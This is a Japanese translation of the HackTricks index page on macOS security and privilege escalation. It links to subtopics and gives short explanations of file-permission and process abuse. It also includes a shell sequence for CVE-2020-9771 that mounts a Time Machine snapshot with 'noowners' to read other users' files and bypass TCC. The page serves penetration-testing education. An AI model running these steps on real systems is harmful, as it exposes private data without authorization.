.. | ||
mac-os-architecture | ||
macos-apps-inspecting-debugging-and-fuzzing | ||
macos-files-folders-and-binaries | ||
macos-proces-abuse | ||
macos-security-protections | ||
macos-applefs.md | ||
macos-basic-objective-c.md | ||
macos-bypassing-firewalls.md | ||
macos-defensive-apps.md | ||
macos-dyld-hijacking-and-dyld_insert_libraries.md | ||
macos-file-extension-apps.md | ||
macos-gcd-grand-central-dispatch.md | ||
macos-protocols.md | ||
macos-users.md | ||
README.md |
macOSのセキュリティと特権エスカレーション
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
HackenProofはすべての暗号バグバウンティのホームです。
遅延なしで報酬を受け取る
HackenProofのバウンティは、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。
Web3ペンテストの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!上昇期のWeb3セキュリティをマスターしましょう。
Web3ハッカーレジェンドになる
各検証済みのバグで評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。
HackenProofでサインアップしてハッキングから報酬を得ましょう!
{% embed url="https://hackenproof.com/register" %}
基本的なMacOS
MacOSに慣れていない場合は、MacOSの基本を学ぶことから始めるべきです:
- 特別なMacOSのファイルと権限:
{% content-ref url="macos-files-folders-and-binaries/" %} macos-files-folders-and-binaries {% endcontent-ref %}
- 一般的なMacOSのユーザー
{% content-ref url="macos-users.md" %} macos-users.md {% endcontent-ref %}
- AppleFS
{% content-ref url="macos-applefs.md" %} macos-applefs.md {% endcontent-ref %}
- カーネルのアーキテクチャ
{% content-ref url="mac-os-architecture/" %} mac-os-architecture {% endcontent-ref %}
- 一般的なMacOSのネットワークサービスとプロトコル
{% content-ref url="macos-protocols.md" %} macos-protocols.md {% endcontent-ref %}
- オープンソースのMacOS: https://opensource.apple.com/
tar.gz
をダウンロードするには、https://opensource.apple.com/source/dyld/のようなURLをhttps://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gzのように変更します。
MacOS MDM
企業では、macOSシステムはおそらくMDMで管理される可能性が高いです。したがって、攻撃者の視点からは、それがどのように機能するかを知ることが興味深いです:
{% content-ref url="../macos-red-teaming/macos-mdm/" %} macos-mdm {% endcontent-ref %}
MacOS - 検査、デバッグ、およびFuzzing
{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %} macos-apps-inspecting-debugging-and-fuzzing {% endcontent-ref %}
MacOSのセキュリティ保護
{% content-ref url="macos-security-protections/" %} macos-security-protections {% endcontent-ref %}
攻撃対象
ファイルの権限
rootとして実行されているプロセスがユーザーによって制御可能なファイルを書き込む場合、ユーザーはこれを悪用して特権をエスカレーションすることができます。
これは次の状況で発生する可能性があります:
- 使用されるファイルはすでにユーザーによって作成されています(ユーザーが所有しています)
- 使用されるファイルはグループによって書き込み可能になっています
- 使用されるファイルはユーザーが所有するディレクトリ内にあります(ユーザーはファイルを作成できます)
- 使用されるファイルはrootが所有するディレクトリ内にありますが、ユーザーはグループによる書き込みアクセス権を持っています(ユーザーはファイルを作成できます)
rootが使用するファイルを作成できるようになると、ユーザーはその内容を利用したり、別の場所を指すためにシンボリックリンク/ハードリンクを作成したりすることができます。
このような脆弱性の場合、脆弱な.pkg
インストーラーをチェックすることを忘れないでください:
{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} macos-installers-abuse.md {% endcontent-ref %}
プロセスの乱用による権限と特権の乱用
もしプロセスが、より高い権限や特権を持つ他のプロセスにコードを注入したり、それと連絡を取ったりして特権操作を実行できる場合、彼は特権を昇格させ、SandboxやTCCなどの防御策をバイパスすることができます。
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
ファイル拡張子とURLスキームのアプリハンドラ
ファイル拡張子によって登録された奇妙なアプリは乱用される可能性があり、異なるアプリケーションが特定のプロトコルを開くために登録されることがあります。
{% content-ref url="macos-file-extension-apps.md" %} macos-file-extension-apps.md {% endcontent-ref %}
MacOS特権昇格
CVE-2020-9771 - mount_apfs TCCバイパスと特権昇格
どのユーザー(特権を持たないユーザーも含む)でも、タイムマシンのスナップショットを作成し、マウントし、そのスナップショットのすべてのファイルにアクセスすることができます。
必要なのは、使用されるアプリケーション(例:Terminal
)がフルディスクアクセス(FDA)アクセス(kTCCServiceSystemPolicyAllfiles
)を持つ必要があり、それは管理者によって許可される必要があります。
{% code overflow="wrap" %}
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
{% endcode %}
より詳しい説明は元のレポートで見つけることができます。
機密情報
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}
Linux Privesc
まず、Linux/Unixに影響を与える特権昇格に関するほとんどのトリックは、MacOSマシンにも影響を与えることに注意してください。したがって、次を参照してください:
{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}
MacOSの防御アプリ
参考文献
- OS X Incident Response: Scripting and Analysis
- https://taomm.org/vol1/analysis.html
- https://github.com/NicolasGrimonpont/Cheatsheet
- https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ
- https://www.youtube.com/watch?v=vMGiplQtjTY
HackenProofはすべての暗号バグバウンティの場です。
遅延なしで報酬を受け取る
HackenProofのバウンティは、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。
Web3ペントestingの経験を積む
ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!上昇期のweb3セキュリティをマスターしましょう。
Web3ハッカーレジェンドになる
各検証済みのバグで評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。
HackenProofにサインアップしてハッキングから報酬を得ましょう!
{% embed url="https://hackenproof.com/register" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Family、私たちの独占的なNFTコレクションを発見してください。
- 公式のPEASS&HackTricksグッズを手に入れましょう。
- 💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦@carlospolopmをフォローしてください。
- ハッキングのトリックを共有するには、hacktricks repo と hacktricks-cloud repo にPRを提出してください。